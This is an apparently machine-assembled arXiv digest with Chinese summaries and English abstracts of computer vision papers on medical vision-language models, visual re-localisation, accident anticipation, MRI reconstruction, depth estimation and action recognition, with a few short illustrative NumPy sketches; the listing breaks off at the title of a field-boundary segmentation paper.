[CV-213] MEDIC-AD: Towards Medical Vision-Language Models Clinical Intelligence
【速读】:该论文旨在解决当前医学视觉语言模型(Medical Vision-Language Models, VLMs)在临床实践中缺乏将广泛知识转化为可操作输出的能力这一问题,具体聚焦于病灶检测(lesion detection)、症状追踪(symptom tracking)和视觉可解释性(visual explainability)三大核心任务。其解决方案的关键在于提出一个分阶段的框架MEDIC-AD:首先引入可学习的异常感知令牌(Ano),增强模型对异常区域的关注并构建以病灶为中心的判别性表征;其次设计图像间差异令牌(Diff),显式编码多期影像间的时序变化,从而区分疾病负担的恶化、改善与稳定;最后设置专门的可解释性阶段,训练模型生成与推理一致的热力图,提供清晰的可视化证据。这一分阶段设计(staged design)显著提升了模型在异常检测、症状追踪及异常分割上的性能,并在真实临床纵向数据上验证了其预测稳定性与临床可解释性。
链接: https://arxiv.org/abs/2603.27176
作者: Woohyeon Park,Jaeik Kim,Sunghwan Steve Cho,Pa Hong,Wookyoung Jeong,Yoojin Nam,Namjoon Kim,Ginny Y. Wong,Ka Chun Cheung,Jaeyoung Do
机构: Seoul National University (首尔国立大学); Samsung Changwon Hospital (三星昌原医院); Samsung Medical Center (三星医疗中心); NVIDIA (英伟达)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Lesion detection, symptom tracking, and visual explainability are central to real-world medical image analysis, yet current medical Vision-Language Models (VLMs) still lack mechanisms that translate their broad knowledge into clinically actionable outputs. To bridge this gap, we present MEDIC-AD, a clinically oriented VLM that strengthens these three capabilities through a stage-wise framework. First, learnable anomaly-aware tokens (Ano) encourage the model to focus on abnormal regions and build more discriminative lesion centered representations. Second, inter image difference tokens (Diff) explicitly encode temporal changes between studies, allowing the model to distinguish worsening, improvement, and stability in disease burden. Finally, a dedicated explainability stage trains the model to generate heatmaps that highlight lesion-related regions, offering clear visual evidence that is consistent with the model’s reasoning. Through our staged design, MEDIC-AD steadily boosts performance across anomaly detection, symptom tracking, and anomaly segmentation, achieving state-of-the-art results compared with both closed source and medical-specialized baselines. Evaluations on real longitudinal clinical data collected from real hospital workflows further show that MEDIC-AD delivers stable predictions and clinically faithful explanations in practical patient-monitoring and decision-support workflows.
[CV-214] MultiLoc: Multi-view Guided Relative Pose Regression for Fast and Robust Visual Re-Localization
【速读】:该论文旨在解决相对位姿回归(Relative Pose Regression, RPR)在未见环境中性能受限的问题,其核心瓶颈在于现有方法依赖成对且局部的空间视角,难以建模全局一致的几何与空间关系。解决方案的关键在于提出MultiLoc模型,该模型通过在单次前向传播中联合融合多个参考视图及其对应的相机位姿,实现全局一致的空间和几何理解;同时引入基于共可见性的检索策略,以可靠地选取几何相关的参考视图作为上下文信息,从而显著提升零样本位姿估计的准确性与实时性。
链接: https://arxiv.org/abs/2603.27170
作者: Nobel Dang,Bing Li
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Relative Pose Regression (RPR) generalizes well to unseen environments, but its performance is often limited due to pairwise and local spatial views. To this end, we propose MultiLoc, a novel multi-view guided RPR model trained at scale, equipping relative pose regression with globally consistent spatial and geometric understanding. Specifically, our method jointly fuses multiple reference views and their associated camera poses in a single forward pass, enabling accurate zero-shot pose estimation with real-time efficiency. To reliably supply informative context, we further propose a co-visibility-driven retrieval strategy for geometrically relevant reference view selection. MultiLoc establishes a new benchmark in visual re-localization, consistently outperforming existing state-of-the-art (SOTA) relative pose regression (RPR) methods across diverse datasets, including WaySpots, Cambridge Landmarks, and Indoor6. Furthermore, MultiLoc’s pose regressor exhibits SOTA performance in relative pose estimation, surpassing RPR, feature matching and non-regression-based techniques on the MegaDepth-1500, ScanNet-1500, and ACID benchmarks. These results demonstrate robust domain generalization of MultiLoc across indoor, outdoor and natural environments. Code will be made publicly available.
[CV-215] RiskProp: Collision-Anchored Self-Supervised Risk Propagation for Early Accident Anticipation CVPR2026
【速读】:该论文旨在解决现有事故预判方法依赖主观且不一致的异常起始(onset)帧标注进行二元监督、从而导致风险估计不准的问题。其解决方案的关键在于提出 RiskProp,一种基于碰撞锚定的自监督风险传播范式,仅需可靠标注的碰撞帧即可建模时间上的风险演化过程;核心创新包括两个观察驱动的损失函数:一是利用未来帧预测作为软目标的未来帧正则化损失,实现风险信号向后传播;二是设计自适应单调约束以鼓励风险随时间非递减的趋势,从而提升早期预警能力与可解释性。
链接: https://arxiv.org/abs/2603.27165
作者: Yiyang Zou,Tianhao Zhao,Peilun Xiao,Hongyu Jin,Longyu Qi,Yuxuan Li,Liyin Liang,Yifeng Qian,Chunbo Lai,Yutian Lin,Zhihui Li,Yu Wu
机构: Wuhan University (武汉大学); Zhongguancun Academy (中关村学院); Didi Chuxing (滴滴出行); University of Science and Technology of China (中国科学技术大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR 2026
Abstract:Accident anticipation aims to predict impending collisions from dashcam videos and trigger early alerts. Existing methods rely on binary supervision with manually annotated “anomaly onset” frames, which are subjective and inconsistent, leading to inaccurate risk estimation. In contrast, we propose RiskProp, a novel collision-anchored self-supervised risk propagation paradigm for early accident anticipation, which removes the need for anomaly onset annotations and leverages only the reliably annotated collision frame. RiskProp models temporal risk evolution through two observation-driven losses: first, since future frames contain more definitive evidence of an impending accident, we introduce a future-frame regularization loss that uses the model’s next-frame prediction as a soft target to supervise the current frame, enabling backward propagation of risk signals; second, inspired by the empirical trend of rising risk before accidents, we design an adaptive monotonic constraint to encourage a non-decreasing progression over time. Experiments on CAP and Nexar demonstrate that RiskProp achieves state-of-the-art performance and produces smoother, more discriminative risk curves, improving both early anticipation and interpretability.
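RiskProp 的两个损失项含义都很直接:未来帧正则化把下一帧的(固定的)风险预测当作当前帧的软目标,使风险信号从碰撞帧向前回传;单调约束则惩罚风险曲线随时间下降。下面用 NumPy 写一个最小化示意(margin 参数与 L2 形式均为演示性假设,论文中的"自适应"机制未在此体现):

```python
import numpy as np

def riskprop_losses(risk, pred_next, margin=0.0):
    """risk: (T,) 模型输出的逐帧风险分数
    pred_next: (T-1,) 模型对"下一帧"风险的预测,实践中应视为
               停止梯度的软目标(此处为纯前向示意)。
    """
    # 未来帧正则化:把第 t 帧拉向对第 t+1 帧的预测,实现风险向后传播
    future_loss = np.mean((risk[:-1] - pred_next) ** 2)
    # 单调约束:对相邻帧风险的下降量施加 hinge 惩罚(margin 为假设参数)
    diffs = risk[1:] - risk[:-1]
    mono_loss = np.mean(np.maximum(0.0, margin - diffs))
    return future_loss, mono_loss
```

对于单调上升的风险曲线,mono_loss 恰好为 0,只剩软目标一项起作用。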
[CV-216] Weakly Convex Ridge Regularization for 3D Non-Cartesian MRI Reconstruction
【速读】:该论文旨在解决非笛卡尔(non-Cartesian)磁共振成像(MRI)中因高加速采集导致的重建延迟问题,同时克服现有基于深度学习的重建方法在分布偏移(distribution shift)下稳定性与鲁棒性不足的缺陷。其解决方案的关键在于设计了一种旋转不变的弱凸脊正则化器(weakly convex ridge regularizer, WCRR),并将其嵌入变分重建框架中,从而在保证重建质量的同时显著提升计算效率和对不同采集协议(如GoLF SPARKLING和CAIPIRINHA)的鲁棒性,实现了传统变分方法与现代深度学习方法的优势统一。
链接: https://arxiv.org/abs/2603.27158
作者: German Shâma Wache,Chaithya G R,Asma Tanabene,Sebastian Neumayer
机构: Chemnitz University of Technology (开姆尼茨工业大学); CEA Paris-Saclay (法国原子能和替代能源委员会巴黎萨克雷中心); Inria Saclay Centre (法国国家信息与自动化研究院萨克雷中心); Siemens Healthineers (西门子医疗)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:While highly accelerated non-Cartesian acquisition protocols significantly reduce scan time, they often entail long reconstruction delays. Deep learning based reconstruction methods can alleviate this, but often lack stability and robustness to distribution shifts. As an alternative, we train a rotation invariant weakly convex ridge regularizer (WCRR). The resulting variational reconstruction approach is benchmarked against state of the art methods on retrospectively simulated data and (out of distribution) on prospective GoLF SPARKLING and CAIPIRINHA acquisitions. Our approach consistently outperforms widely used baselines and achieves performance comparable to Plug and Play reconstruction with a state of the art 3D DRUNet denoiser, while offering substantially improved computational efficiency and robustness to acquisition changes. In summary, WCRR unifies the strengths of principled variational methods and modern deep learning based approaches.
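WCRR 所在的变分重建框架可写作 x* = argmin ½‖Ax−y‖² + λR(x),其中 R 为学习得到的弱凸脊正则化器。下面是一个与具体正则化器无关的梯度下降骨架,仅示意该类方法的求解流程;grad_R 在此用任意可调用对象代替训练好的 WCRR 梯度,步长与迭代数均为演示性假设:

```python
import numpy as np

def variational_recon(y, A, grad_R, lam=0.1, step=0.1, iters=100):
    """对 0.5*||A x - y||^2 + lam * R(x) 做梯度下降。

    A: 前向算子(此处以矩阵示意,MRI 中对应非笛卡尔采样算子)
    grad_R: 正则化器梯度 x -> dR/dx(代入学习到的 WCRR 梯度)
    """
    x = A.T @ y                              # 用伴随算子回投作为初始化
    for _ in range(iters):
        grad = A.T @ (A @ x - y) + lam * grad_R(x)
        x = x - step * grad
    return x
```

例如取 A 为单位阵、grad_R(x)=x(即 Tikhonov 正则),闭式解为 y/(1+λ),可用来验证骨架收敛正确。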
[CV-217] DiffSoup: Direct Differentiable Rasterization of Triangle Soup for Extreme Radiance Field Simplification
【速读】:该论文旨在解决辐射场(Radiance Field)重建中如何实现高效在线传输与跨平台渲染的问题,尤其是在资源受限设备上保持高质量视觉效果的挑战。现有方法如3D高斯溅射(3D Gaussian Splatting)虽能实现实时高质量渲染,但模型复杂度高,难以在消费级硬件上部署。其解决方案的关键在于提出DiffSoup——一种基于少量三角形构成的“汤状”(soup)结构表示,每个三角形具有神经纹理(neural texture)和二值不透明度(binary opacity),并通过随机不透明度掩蔽(stochastic opacity masking)实现端到端可微分训练,无需平滑器(mollifier)即可稳定优化。该设计支持标准深度测试的光栅化,兼容传统图形管线,从而在消费级笔记本和移动设备上实现交互式渲染。
链接: https://arxiv.org/abs/2603.27151
作者: Kenji Tojo,Bernd Bickel,Nobuyuki Umetani
机构: The University of Tokyo (东京大学); ETH Zürich (苏黎世联邦理工学院)
类目: Graphics (cs.GR); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Radiance field reconstruction aims to recover high-quality 3D representations from multi-view RGB images. Recent advances, such as 3D Gaussian splatting, enable real-time rendering with high visual fidelity on sufficiently powerful graphics hardware. However, efficient online transmission and rendering across diverse platforms requires drastic model simplification, reducing the number of primitives by several orders of magnitude. We introduce DiffSoup, a radiance field representation that employs a soup (i.e., a highly unstructured set) of a small number of triangles with neural textures and binary opacity. We show that this binary opacity representation is directly differentiable via stochastic opacity masking, enabling stable training without a mollifier (i.e., smooth rasterization). DiffSoup can be rasterized using standard depth testing, enabling seamless integration into traditional graphics pipelines and interactive rendering on consumer-grade laptops and mobile devices. Code is available at this https URL.
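DiffSoup 的关键是二值不透明度的随机掩蔽:前向时采样硬的 0/1 掩码,其期望等于连续 logit 经 sigmoid 得到的软不透明度,训练时梯度走软概率(straight-through 风格),渲染时则直接用硬掩码配合标准深度测试。下面用 NumPy 演示采样及其无偏性,梯度部分超出纯 NumPy 范畴,未包含:

```python
import numpy as np

def stochastic_opacity(logits, rng):
    """采样二值不透明度,使 E[hard] = sigmoid(logits)。

    训练中可让梯度经由软概率 p 传播(straight-through 式近似,
    此处仅示意前向);渲染时三角形按 hard 值做普通深度测试。
    """
    p = 1.0 / (1.0 + np.exp(-logits))        # 软不透明度,取值 (0, 1)
    u = rng.random(p.shape)
    hard = (u < p).astype(np.float64)        # 二值采样,期望等于 p
    return hard, p
```

多次采样取均值应逼近 p,这正是"可直接微分"论断所依赖的无偏性。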
[CV-218] Follow Your Heart: Landmark-Guided Transducer Pose Scoring for Point-of-Care Echocardiography
【速读】:该论文旨在解决便携式经胸超声心动图(point-of-care transthoracic echocardiography, TTE)中初学者难以稳定获取高质量心尖四腔观(apical 4-chamber view, A4CH)的问题,以及由此导致的左心室射血分数(left ventricular ejection fraction, LVEF)测量准确性下降的问题。解决方案的关键在于提出一个级联的多任务神经网络架构,该架构包含两个核心模块:一是基于图像的探头姿态评分模块,用于判断当前探头位置是否接近或偏离最优A4CH视图;二是不确定性感知的左心室解剖标志点检测器,可自动定位关键解剖结构并实现LVEF的精准估算。该方法无需额外的探头位置追踪设备,仅依赖图像信息即可提供视觉引导和定量测量,具有在资源有限环境中部署的潜力。
链接: https://arxiv.org/abs/2603.27143
作者: Zaiyang Guo,Jessie N. Dong,Filippos Bellos,Jilei Hao,Emily J. MacKay,Trevor Chan,Shir Goldfinger,Sethu Reddy,Steven Vance,Jason J. Corso,Alison M. Pouch
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: Accepted for oral presentation at the International Symposium on Biomedical Imaging 2026
Abstract:Point-of-care transthoracic echocardiography (TTE) makes it possible to assess a patient’s cardiac function in almost any setting. A critical step in the TTE exam is acquisition of the apical 4-chamber (A4CH) view, which is used to evaluate clinically impactful measurements such as left ventricular ejection fraction (LVEF). However, optimizing transducer pose for high-quality image acquisition and subsequent measurement is a challenging task, particularly for novice users. In this work, we present a multi-task network that provides feedback cues for A4CH view acquisition and automatically estimates LVEF in high-quality A4CH images. The network cascades a transducer pose scoring module and an uncertainty-aware LV landmark detector with automated LVEF estimation. A strength is that network training and inference do not require cumbersome or costly setups for transducer position tracking. We evaluate performance on point-of-care TTE data acquired with a spatially dense “sweep” protocol around the optimal A4CH view. The results demonstrate the network’s ability to determine when the transducer pose is on target, close to target, or far from target based on the images alone, while generating visual landmark cues that guide anatomical interpretation and orientation. In conclusion, we demonstrate a promising strategy to provide guidance for A4CH view acquisition, which may be useful when deploying point-of-care TTE in limited resource settings.
[CV-219] The Geometry of Robustness: Optimizing Loss Landscape Curvature and Feature Manifold Alignment for Robust Finetuning of Vision-Language Models
【速读】:该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在微调过程中面临的三重权衡问题:分布内(In-Distribution, ID)准确率、分布外(Out-of-Distribution, OOD)泛化能力与对抗鲁棒性之间的矛盾。现有方法仅能优化其中两个维度,例如保持ID/OOD性能但缺乏对抗鲁棒性,或通过对抗训练提升鲁棒性却牺牲了ID/OOD准确率。其核心洞察是,这一权衡源于参数空间中的尖锐各向异性极小值和特征空间中对扰动不稳定的表示。解决方案的关键在于提出GRACE(Gram-aligned Robustness via Adaptive Curvature Estimation),该框架基于鲁棒PAC-Bayes理论,联合正则化参数空间曲率与特征空间不变性:一方面利用局部曲率自适应调整权重扰动以促进平坦极小值;另一方面引入特征对齐损失确保干净样本、对抗样本及分布外样本下的表示一致性。实验表明,GRACE在ImageNet微调CLIP模型时,同时提升了ID准确率(+10.8%)和对抗准确率(+13.5%),并维持了接近零样本基线的OOD准确率(57.0% vs. 57.4%)。几何分析进一步验证了GRACE收敛至平坦极小值且无特征失真,为构建具备广义鲁棒性的基础VLM提供了理论依据。
链接: https://arxiv.org/abs/2603.27139
作者: Shivang Chopra,Shaunak Halbe,Chengyue Huan,Brisa Maneechotesuwan,Zsolt Kira
机构: Georgia Institute of Technology (佐治亚理工学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Fine-tuning approaches for Vision-Language Models (VLMs) face a critical three-way trade-off between In-Distribution (ID) accuracy, Out-of-Distribution (OOD) generalization, and adversarial robustness. Existing robust fine-tuning strategies resolve at most two axes of this trade-off. Generalization-preserving methods retain ID/OOD performance but leave models vulnerable to adversarial attacks, while adversarial training improves robustness to targeted attacks but degrades ID/OOD accuracy. Our key insight is that the robustness trade-off stems from two geometric failures: sharp, anisotropic minima in parameter space and unstable feature representations that deform under perturbation. To address this, we propose GRACE (Gram-aligned Robustness via Adaptive Curvature Estimation), a unified fine-tuning framework that jointly regularizes the parameter-space curvature and feature-space invariance for VLMs. Grounded in Robust PAC-Bayes theory, GRACE employs adaptive weight perturbations scaled by local curvature to promote flatter minima, combined with a feature alignment loss that maintains representation consistency across clean, adversarial, and OOD inputs. On ImageNet fine-tuning of CLIP models, GRACE simultaneously improves ID accuracy by 10.8%, and adversarial accuracy by 13.5% while maintaining 57.0% OOD accuracy (vs. 57.4% zero-shot baseline). Geometric analysis confirms that GRACE converges to flatter minima without feature distortion across distribution shifts, providing a principled step toward generalized robustness in foundation VLMs.
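GRACE 的两个组件都可以写成很短的函数:一是按局部曲率缩放扰动半径的 SAM 式权重扰动,二是约束干净/对抗/OOD 三种输入下特征一致的对齐损失。下面的 NumPy 草图仅为概念性示意,其中"半径随曲率衰减"的具体缩放公式与 L2 形式的对齐损失都是本文未给出的假设:

```python
import numpy as np

def curvature_scaled_perturbation(grad, curvature, rho=0.05, eps=1e-12):
    """SAM 式上升方向,曲率越大半径越小,以偏好更平坦的极小值。
    radius = rho / (1 + curvature) 仅为假设的缩放规则。"""
    radius = rho / (1.0 + curvature)
    return radius * grad / (np.linalg.norm(grad) + eps)

def feature_alignment_loss(f_clean, f_adv, f_ood):
    """惩罚干净样本特征与对抗/OOD 特征之间的漂移(L2 形式为假设)。"""
    return np.mean((f_clean - f_adv) ** 2) + np.mean((f_clean - f_ood) ** 2)
```

曲率为 0 时扰动半径即 rho,曲率越高扰动越保守;三路特征完全一致时对齐损失为 0。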
[CV-220] SJD-VP: Speculative Jacobi Decoding with Verification Prediction for Autoregressive Image Generation
【速读】:该论文旨在解决生成式 AI(Generative AI)中自回归图像生成时,推测解码(Speculative Jacobi Decoding, SJD)方法因令牌选择模糊性导致的推测令牌接受率低的问题。现有方法主要从宽松的令牌验证角度缓解此问题,但未能充分利用解码过程中的迭代动态特性。解决方案的关键在于提出一种基于验证预测的推测雅可比解码(Speculative Jacobi Decoding with Verification Prediction, SJD-VP),其核心思想是利用迭代过程中令牌概率的变化趋势来引导采样,优先选择概率上升的令牌,从而有效预测哪些令牌更可能通过后续验证,显著提升接受率。该方法具有即插即用特性,可无缝集成至现有 SJD 方法中,并在标准基准测试中持续加速自回归解码并提升图像生成质量。
链接: https://arxiv.org/abs/2603.27115
作者: Bingqi Shan,Baoquan Zhang,Xiaochen Qi,Xutao Li,Yunming Ye,Liqiang Nie
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Speculative Jacobi Decoding (SJD) has emerged as a promising method for accelerating autoregressive image generation. Despite its potential, existing SJD approaches often suffer from the low acceptance rate issue of speculative tokens due to token selection ambiguity. Recent works attempt to mitigate this issue primarily from the relaxed token verification perspective but fail to fully exploit the iterative dynamics of decoding. In this paper, we conduct an in-depth analysis and make a novel observation that tokens whose probabilities increase are more likely to match the verification-accepted and correct token. Based on this, we propose a novel Speculative Jacobi Decoding with Verification Prediction (SJD-VP). The key idea is to leverage the change in token probabilities across iterations to guide sampling, favoring tokens whose probabilities increase. This effectively predicts which tokens are likely to pass subsequent verification, boosting the acceptance rate. In particular, our SJD-VP is plug-and-play and can be seamlessly integrated into existing SJD methods. Extensive experiments on standard benchmarks demonstrate that our SJD-VP method consistently accelerates autoregressive decoding while improving image generation quality.
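SJD-VP 的核心观察是:在雅可比迭代间概率上升的 token 更可能通过后续验证,因此采样时应向其倾斜。下面的 NumPy 片段示意这种"验证预测"式的选择规则;其中对上升 token 的乘性加权(boost)只是众多可行实现中的一种假设形式:

```python
import numpy as np

def vp_select(prev_probs, curr_probs, boost=2.0):
    """对当前 token 分布重新加权:相比上一轮雅可比迭代
    概率上升的 token 得到额外权重(boost 为假设的超参数)。"""
    delta = curr_probs - prev_probs
    weights = np.where(delta > 0, boost, 1.0)
    scores = curr_probs * weights
    return int(np.argmax(scores))
```

当某 token 当前概率略低但正在上升时,该规则会优先选它而非朴素 argmax,从而提升推测 token 的接受率。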
[CV-221] RailVQA: A Benchmark and Framework for Efficient Interpretable Visual Cognition in Automatic Train Operation
【速读】:该论文旨在解决自动列车运行(ATO)系统在复杂动态铁路环境中面临的两大核心问题:一是现有感知方法对罕见但关键的安全场景泛化能力差,且缺乏面向操作决策的高阶推理与规划能力;二是尽管大型多模态模型(LMMs)具备较强的通用性和认知能力,但在安全关键场景中受限于高计算开销和幻觉风险,同时缺乏可靠的领域专用评估基准。解决方案的关键在于提出两个创新:其一,构建首个针对ATO驾驶室视角视觉认知的VQA基准RailVQA-bench,包含20,000个单帧和1,168个视频问答对,用于系统性评估认知泛化与可解释性;其二,设计一种协同式大-小模型框架RailVQA-CoM,通过透明的三模块架构与自适应时间采样机制,将小模型的高效性与大模型的认知能力相结合,显著提升感知泛化性能、推理效率与跨域适应性,同时降低推理延迟并增强可解释性,支持即插即用部署于自动驾驶系统。
链接: https://arxiv.org/abs/2603.27112
作者: Sen Zhang,Runmei Li,Zhichao Zheng,Yuhe Zhang,Jiani Li,Kailun Zhang,Tao Zhang,Wenjun Wu,Qunbo Wang
机构: Beijing Jiaotong University (北京交通大学); Northwestern Polytechnical University (西北工业大学); Beihang University (北京航空航天大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Automatic Train Operation (ATO) relies on low-latency, reliable cab-view visual perception and decision-oriented inference to ensure safe operation in complex and dynamic railway environments. However, existing approaches focus primarily on basic perception and often generalize poorly to rare yet safety-critical corner cases. They also lack the high-level reasoning and planning capabilities required for operational decision-making. Although recent Large Multi-modal Models (LMMs) show strong generalization and cognitive capabilities, their use in safety-critical ATO is hindered by high computational cost and hallucination risk. Meanwhile, reliable domain-specific benchmarks for systematically evaluating cognitive capabilities are still lacking. To address these gaps, we introduce RailVQA-bench, the first VQA benchmark for cab-view visual cognition in ATO, comprising 20,000 single-frame and 1,168 video based QA pairs to evaluate cognitive generalization and interpretability in both static and dynamic scenarios. Furthermore, we propose RailVQA-CoM, a collaborative large-small model framework that combines small-model efficiency with large-model cognition via a transparent three-module architecture and adaptive temporal sampling, improving perceptual generalization and enabling efficient reasoning and planning. Experiments demonstrate that the proposed approach substantially improves performance, enhances interpretability, reduces inference latency, and strengthens cross-domain generalization, while enabling plug-and-play deployment in autonomous driving systems. Code and datasets will be available at this https URL.
[CV-222] MotiMem: Motion-Aware Approximate Memory for Energy-Efficient Neural Perception in Autonomous Vehicles
【速读】:该论文旨在解决高分辨率传感器在电池受限的电动汽车中因数据传输能耗过高而导致的内存墙问题,传统图像压缩方法因语义无感知且优化目标为存储而非总线切换活动,难以有效降低内存接口动态能耗。解决方案的关键在于提出一种软硬件协同设计的接口MotiMem:一方面利用时间相干性,通过轻量级2D运动传播动态识别感兴趣区域(Regions of Interest, RoI);另一方面采用混合稀疏感知编码策略,结合自适应翻转与截断机制诱导比特级稀疏性,从而显著降低内存访问能耗。实验表明,MotiMem在nuScenes、Waymo和KITTI数据集上使用16种检测模型时,可减少约43%的内存接口动态能量消耗,同时保持约93%的目标检测准确率,优于JPEG和WebP等标准编解码器。
链接: https://arxiv.org/abs/2603.27108
作者: Haohua Que,Mingkai Liu,Jiayue Xie,Haojia Gao,Jiajun Sun,Hongyi Xu,Handong Yao,Fei Qiao
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 8 pages,6 figures,conference
Abstract:High-resolution sensors are critical for robust autonomous perception but impose a severe memory wall on battery-constrained electric vehicles. In these systems, data movement energy often outweighs computation. Traditional image compression is ill-suited as it is semantically blind and optimizes for storage rather than bus switching activity. We propose MotiMem, a hardware-software co-designed interface. Exploiting temporal coherence,MotiMem uses lightweight 2D Motion Propagation to dynamically identify Regions of Interest (RoI). Complementing this, a Hybrid Sparsity-Aware Coding scheme leverages adaptive inversion and truncation to induce bitlevel sparsity. Extensive experiments across nuScenes, Waymo, and KITTI with 16 detection models demonstrate that MotiMem reduces memory-interface dynamic energy by approximately 43 percent while retaining approximately 93 percent of the object detection accuracy, establishing a new Pareto frontier significantly superior to standard codecs like JPEG and WebP.
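MotiMem 中的"自适应翻转"与经典的总线反转编码(bus-invert coding)同源:若传输下一字会使超过一半的总线位翻转,就改发其按位取反并置一位反转标志,从而压低切换能耗。下面是该思想的最小 Python 示意(标志位本身的开销在注释中说明,未计入统计):

```python
import numpy as np

def bus_invert(words, width=8):
    """自适应反转编码:当下一字相对前一传输字的汉明距离
    超过总线宽度一半时,改发按位取反值(实际硬件需额外一根
    标志线告知接收端,本示意未把该线的翻转计入 toggles)。"""
    prev = 0
    out, toggles = [], 0
    mask = (1 << width) - 1
    for w in words:
        flips = bin((prev ^ w) & mask).count("1")
        if flips > width // 2:
            w = (~w) & mask                  # 反转以减少位翻转
            flips = width - flips
        out.append(w)
        toggles += flips
        prev = w
    return out, toggles
```

例如前字为 0x00 时发送 0xFF,朴素传输要翻转全部 8 位,反转后线上实际发送 0x00,翻转数降为 0。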
[CV-223] UniDAC: Universal Metric Depth Estimation for Any Camera
【速读】:该论文旨在解决单目度量深度估计(Monocular Metric Depth Estimation, MMDE)在不同相机类型(如鱼眼和360°相机)之间泛化能力差的问题。现有方法通常依赖于特定视角范围(Large-FoV)的训练数据或为不同相机域分别训练模型,限制了通用性。解决方案的关键在于提出UniDAC框架,通过将度量深度估计解耦为相对深度预测与空间变化尺度估计两个阶段,实现跨域鲁棒性;同时引入轻量级深度引导的尺度估计模块(Depth-Guided Scale Estimation),利用相对深度图指导粗尺度图上采样以捕捉局部尺度变化,并设计RoPE-φ这一畸变感知的位置嵌入机制,基于纬度加权尊重等距矩形投影(Equi-Rectangular Projection, ERP)的空间扭曲特性,从而在单一模型下实现跨相机类型的最优性能。
链接: https://arxiv.org/abs/2603.27105
作者: Girish Chandar Ganesan,Yuliang Guo,Liu Ren,Xiaoming Liu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Monocular metric depth estimation (MMDE) is a core challenge in computer vision, playing a pivotal role in real-world applications that demand accurate spatial understanding. Although prior works have shown promising zero-shot performance in MMDE, they often struggle with generalization across diverse camera types, such as fisheye and 360^\circ cameras. Recent advances have addressed this through unified camera representations or canonical representation spaces, but they require either including large-FoV camera data during training or separately trained models for different domains. We propose UniDAC, an MMDE framework that presents universal robustness in all domains and generalizes across diverse cameras using a single model. We achieve this by decoupling metric depth estimation into relative depth prediction and spatially varying scale estimation, enabling robust performance across different domains. We propose a lightweight Depth-Guided Scale Estimation module that upsamples a coarse scale map to high resolution using the relative depth map as guidance to account for local scale variations. Furthermore, we introduce RoPE- \phi , a distortion-aware positional embedding that respects the spatial warping in Equi-Rectangular Projections (ERP) via latitude-aware weighting. UniDAC achieves state of the art (SoTA) in cross-camera generalization by consistently outperforming prior methods across all datasets.
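UniDAC 把度量深度解耦为"相对深度 × 空间可变尺度",其中粗尺度图需上采样到全分辨率。下面用最简单的最近邻上采样代替论文中的深度引导上采样模块,仅示意这种组合方式(上采样策略为演示性替代):

```python
import numpy as np

def compose_metric_depth(rel_depth, coarse_scale):
    """度量深度 = 相对深度 x 逐像素尺度。

    rel_depth: (H, W) 相对深度图
    coarse_scale: (h, w) 粗尺度图,H/W 需为 h/w 的整数倍;
    此处用最近邻上采样代替论文的 Depth-Guided Scale Estimation。
    """
    H, W = rel_depth.shape
    h, w = coarse_scale.shape
    scale_full = np.repeat(np.repeat(coarse_scale, H // h, axis=0),
                           W // w, axis=1)
    return rel_depth * scale_full
```

这种解耦让相对深度分支可跨相机域共享,而尺度分支吸收各域的度量差异。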
[CV-224] LLM Enhanced Action Recognition via Hierarchical Global-Local Skeleton-Language Model
【速读】:该论文旨在解决基于骨骼的动作识别(Skeleton-based Human Action Recognition)中现有图卷积网络(GCN)方法依赖短程运动拓扑结构所导致的局限性,包括难以捕捉长距离关节依赖关系与复杂时间动态特性,以及跨模态语义对齐和理解能力不足的问题。解决方案的关键在于提出一种分层全局-局部骨架-语言模型(Hierarchical Global-Local Skeleton-Language Model, HocSLM),其核心创新包括:1)设计分层全局-局部网络(HGLNet),通过复合拓扑空间模块与双路径分层时间模块协同建模全局与局部尺度下的动态交互,同时保留人体物理结构先验知识,提升复杂时空关系的表征能力;2)利用大规模视觉语言模型(VLM)生成视频文本描述,提供丰富动作语义信息用于训练骨架-语言模型;3)引入骨架-语言序列融合模块,结合HGLNet特征与文本描述,借助骨架-语言模型(SLM)在统一语义空间内精确对齐骨骼时空特征与文本动作描述,显著增强模型的语义区分能力和跨模态理解性能。
链接: https://arxiv.org/abs/2603.27103
作者: Ruosi Wang,Fangwei Zuo,Lei Li,Zhaoqiang Xia
机构: Northwestern Polytechnical University (西北工业大学); Shandong University of Finance and Economics (山东财经大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Skeleton-based human action recognition has achieved remarkable progress in recent years. However, most existing GCN-based methods rely on short-range motion topologies, which not only struggle to capture long-range joint dependencies and complex temporal dynamics but also limit cross-modal semantic alignment and understanding due to insufficient modeling of action semantics. To address these challenges, we propose a hierarchical global-local skeleton-language model (HocSLM), enabling the large action model be more representative of action semantics. First, we design a hierarchical global-local network (HGLNet) that consists of a composite-topology spatial module and a dual-path hierarchical temporal module. By synergistically integrating multi-level global and local modules, HGLNet achieves dynamically collaborative modeling at both global and local scales while preserving prior knowledge of human physical structure, significantly enhancing the model’s representation of complex spatio-temporal relationships. Then, a large vision-language model (VLM) is employed to generate textual descriptions by passing the original RGB video sequences to this model, providing the rich action semantics for further training the skeleton-language model. Furthermore, we introduce a skeleton-language sequential fusion module by combining the features from HGLNet and the generated descriptions, which utilizes a skeleton-language model (SLM) for aligning skeletal spatio-temporal features and textual action descriptions precisely within a unified semantic space. The SLM model could significantly enhance the HGLNet’s semantic discrimination capabilities and cross-modal understanding abilities. Extensive experiments demonstrate that the proposed HocSLM achieves the state-of-the-art performance on three mainstream benchmark datasets: NTU RGB+D 60, NTU RGB+D 120, and Northwestern-UCLA.
[CV-225] PRUE: A Practical Recipe for Field Boundary Segmentation at Scale CVPR2026
